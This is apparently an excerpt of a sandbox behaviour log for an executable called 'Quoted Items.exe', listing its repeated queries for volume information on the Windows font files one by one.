          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Quoted Items.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
